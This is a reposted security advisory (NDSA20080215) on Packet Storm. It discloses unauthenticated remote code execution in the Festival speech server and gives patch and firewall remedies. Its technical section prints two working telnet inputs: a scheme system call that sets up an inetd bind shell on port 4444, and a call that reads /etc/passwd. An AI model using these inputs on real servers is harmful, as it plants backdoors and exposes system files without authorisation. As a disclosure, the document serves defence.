seeing is believing

NDSA20080215.txt

NDSA20080215.txt
Posted Apr 5, 2008
Authored by Tim Brown | Site nth-dimension.org.uk

Nth Dimension Security Advisory (NDSA20080215) - The Festival server is vulnerable to unauthenticated remote code execution. Further research indicates that this vulnerability has already been reported as a local privilege escalation against both the Gentoo and SuSE GNU/Linux distributions. The remote form of this vulnerability was identified in 1.96~beta-5 as distributed in Debian unstable but it is also believed that Ubuntu Hardy Heron was affected.

tags | advisory, remote, local, code execution
systems | linux, suse, debian, gentoo, ubuntu
MD5 | 8491b07e54d530655b227b344f7bff1a

NDSA20080215.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Nth Dimension Security Advisory (NDSA20080215)
Date: 15th February 2008
Author: Tim Brown <mailto:timb@nth-dimension.org.uk>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: Festival 1.96:beta July 2004 <http://www.cstr.ed.ac.uk/projects/festival.html>
Vendor: Centre for Speech Technology Research, University of Edinburgh <http://www.cstr.ed.ac.uk/>
Risk: Medium

Summary

The Festival server is vulnerable to unauthenticated remote code execution.

Further research indicates that this vulnerability has already been reported
as a local privilege escalation against both the Gentoo and SuSE GNU/Linux
distributions and was assigned CVE-2007-4074.

The remote form of this vulnerability was identified in 1.96~beta-5 as
distributed in Debian unstable but it is also believed that Ubuntu Hardy
Heron was affected.

Technical Details

The Festival server which can be started using festival --server is vulnerable
to unauthenticated remote command execution due to the inclusion of a scheme
interpreter. It is possible to make use of standard scheme functions in order
to execute further code, like so:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo '4444 stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")

Connection closed by foreign host.

Whilst this is the most trivial way that the vulnerability can be exploited
the inclusion of a scheme interpreter available without authentication allows
for other vectors of attack. Scheme functions such as SayText and tts (which
reads a file on the vulnerable system) pose particular interest, for example:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)

Whilst it is acknowledged that the inclusion of the scheme interpreter in this
manner is entirely intentional, the default behaviour of the server could be
exploited particularly where the user is unaware of the servers existance. In
the case of both Debian unstable and Ubuntu Hardy Heron, this meant that the
server was likely to be started by the init subsystem albeit as a non-privileged
user.

Solutions

In order to completely protect against the vulnerability (in the short term),
Nth Dimension recommend turning off the server or filtering connections to the
affected port using a host based firewall. The server itself can be secured by
applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477.
This includes applying a default configuration which limits access to localhost
and setting an optional password which prevents unauthenticated access.

Following vendor notification on the 16th Febuary 2007 (Debian) and 2nd March 2007
(Ubuntu), both issued patched versions in their respective distributions which
document the possible security issue and how it can be resolved and change the
default behaviour of the package to prevent the server being started by the init
subsystem. Details of the Debian changes can be found firstly in bug #466146
and then #466796. Nth Dimension would recommend that the patches for these bugs
are applied. Nth Dimension would like to thank the Debian package maintainer
Kumar Appaiahi as well as Nico Golde of Debian testing security and Jamie
Strandboge of Canonical for the way they worked to resolve the issue.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFH9VORVAlO5exu9x8RAj8RAJ9FTxsDc5sQrIpIyNTStiaui5zISwCeMPiW
+wuTceT8SGnNjV9mUsilh0w=
=dOSa
-----END PGP SIGNATURE-----

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    2 Files
  • 24
    Jul 24th
    19 Files
  • 25
    Jul 25th
    28 Files
  • 26
    Jul 26th
    2 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close